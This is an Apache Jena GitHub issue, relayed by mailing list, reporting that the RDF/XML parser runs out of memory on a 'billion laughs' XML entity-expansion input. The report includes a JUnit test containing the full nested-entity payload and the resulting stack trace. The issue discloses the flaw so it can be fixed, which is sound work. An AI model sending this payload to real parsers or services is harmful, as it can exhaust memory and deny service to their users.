namedgraph opened a new issue, #3595:
URL: https://github.com/apache/jena/issues/3595
### Version
4.7.0
### What happened?
The following test fails for me with `Requested array size exceeds VM limit`:
```java
import org.apache.jena.rdf.model.*;
import org.apache.jena.riot.*;
import org.apache.jena.riot.system.ErrorHandlerFactory;
import org.junit.Test;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import org.apache.jena.riot.system.StreamRDFLib;
public class BillionLaughsTest {
private static final String MALICIOUS = """
<?xml version="1.0"?>
<!DOCTYPE rdf:RDF [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2
"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7
"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8
"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9
"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#";
xmlns:rdfs="http://www.w3.org/2000/01/rdf-schema#";>
<rdf:Description rdf:about="http://example.org/malicious";>
<rdfs:label>&lol9;</rdfs:label>
</rdf:Description>
</rdf:RDF>
""";
@Test
public void testBillionLaughs() {
Model m = ModelFactory.createDefaultModel();
ByteArrayInputStream bais = new
ByteArrayInputStream(MALICIOUS.getBytes(StandardCharsets.UTF_8));
RDFParser parser = RDFParser.create()
.lang(Lang.RDFXML)
.errorHandler(ErrorHandlerFactory.errorHandlerStrict)
.checking(true)
.base("http://example.org/";)
.source(bais)
.build();
System.out.println("Starting parse...");
parser.parse(StreamRDFLib.graph(m.getGraph()));
System.out.println("Model size: " + m.size());
}
}
```
### Relevant output and stacktrace
```shell
Requested array size exceeds VM limit
java.lang.OutOfMemoryError
at java.base/java.util.Arrays.copyOf(Arrays.java:3537)
at
java.base/java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:246)
at
java.base/java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:752)
at java.base/java.lang.StringBuffer.append(StringBuffer.java:410)
at
org.apache.jena.rdfxml.xmlinput.states.AbsWantLiteralValueOrDescription.characters(AbsWantLiteralValueOrDescription.java:62)
at
org.apache.jena.rdfxml.xmlinput.states.WantLiteralValueOrDescription.characters(WantLiteralValueOrDescription.java:77)
at
org.apache.jena.rdfxml.xmlinput.impl.XMLHandler.characters(XMLHandler.java:137)
at org.apache.xerces.parsers.AbstractSAXParser.characters(Unknown
Source)
at org.apache.xerces.impl.dtd.XMLDTDValidator.characters(Unknown Source)
at
org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanContent(Unknown
Source)
at
org.apache.xerces.impl.XMLDocumentFragmentScannerImpl$FragmentContentDispatcher.dispatch(Unknown
Source)
at
org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown
Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
at org.apache.xerces.parsers.XMLParser.parse(Unknown Source)
at org.apache.xerces.parsers.AbstractSAXParser.parse(Unknown Source)
at org.apache.xerces.jaxp.SAXParserImpl$JAXPSAXParser.parse(Unknown
Source)
at
org.apache.jena.rdfxml.xmlinput.impl.RDFXMLParser.parse(RDFXMLParser.java:96)
at org.apache.jena.rdfxml.xmlinput.ARP.load(ARP.java:118)
at
org.apache.jena.riot.lang.ReaderRIOTRDFXML.parse(ReaderRIOTRDFXML.java:186)
at
org.apache.jena.riot.lang.ReaderRIOTRDFXML.read(ReaderRIOTRDFXML.java:84)
at org.apache.jena.riot.RDFParser.read(RDFParser.java:416)
at org.apache.jena.riot.RDFParser.parseNotUri(RDFParser.java:406)
at org.apache.jena.riot.RDFParser.parse(RDFParser.java:356)
at BillionLaughsTest.testBillionLaughs(BillionLaughsTest.java:49)
at
java.base/java.lang.invoke.LambdaForm$DMH/0x0000007e01024800.invokeVirtual(LambdaForm$DMH)
at
java.base/java.lang.invoke.LambdaForm$MH/0x0000007e01025000.invoke(LambdaForm$MH)
at
java.base/java.lang.invoke.Invokers$Holder.invokeExact_MT(Invokers$Holder)
at
java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invokeImpl(DirectMethodHandleAccessor.java:154)
at
java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:104)
at java.base/java.lang.reflect.Method.invoke(Method.java:565)
at
org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:59)
```
### Are you interested in making a pull request?
None
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
